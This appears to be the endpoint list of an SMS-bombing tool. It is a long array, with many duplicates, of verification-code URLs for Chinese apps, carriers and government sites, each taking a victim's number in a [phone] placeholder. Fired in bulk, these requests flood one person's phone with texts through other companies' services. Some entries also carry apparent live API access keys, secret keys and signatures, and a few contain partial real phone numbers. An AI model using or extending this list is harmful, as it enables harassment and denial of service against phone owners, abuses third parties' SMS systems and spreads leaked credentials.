"http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://app.zangcun.com/registerCode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", - "https://www.xd.com/users/sendRegisterCode?callback=jQuery110201470901275837977_1591599902822&mobile=[phone]&area_code=86&_=1591599902823", - "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", - "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", - "http://1314.buzz:80/index.php?hm=[phone]&ok=", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", - "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%3D", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=您的手机验证码为:3973+,该验证码10%", - "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", - "http://hk-dns.sskweb.cn/api.php?act=user&key=XsWxsZDyh58V9whXWR&phone=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", - "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", - "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", - "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", - "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", - "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", - "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", - "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.sbsq.aliwe.com/index.php?s=/api/mobile_verify_code_get_request/index2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://w.xyhsoft.com:80/pypay/xyhpay/util/ZsendCode.do?phone=[phone]", - "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.qmxgz.cn/api/Sms/send?phone=[phone]", - "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://uc.maodou.com/server/account/sendLoginCode?phone=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", - "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", - "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", - "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", - "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", - "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", - "http://www.gangaimall.com:80/mbb-web/api/account/code?mobile=[phone]&type=0", - "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", - "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", - "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", - "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://dakaapp.troila.com:443/api/v7/index/send_sms?phone=[phone]&expect=0", - "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", - "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=+86&validateType=1", - "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=%E9%BD%90%E6%99%A8&fromurls=http%3A%2F%2Fwww.mianfeidianhua.net%2Fhsnzy.html&content=%E6%83%B3%E5%92%A8%E8%AF%A2%E3%80%82&did=382&uid=2010131726&phone=[phone]&_=1551173567919", - "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", - "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", - "http://user.daojia.com/mobile/getcode?mobile=[phone]", - "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", - "https://m.zhaopin.com/api/capi?capiUrl=passport/getSmsCodeSecurity&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", - "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=+86&phone_number=[phone]&type=activation&version=1", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", - "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", - "https://couple-api.jizhangapp.com/login/captcha/[phone]", - "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", - "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", - 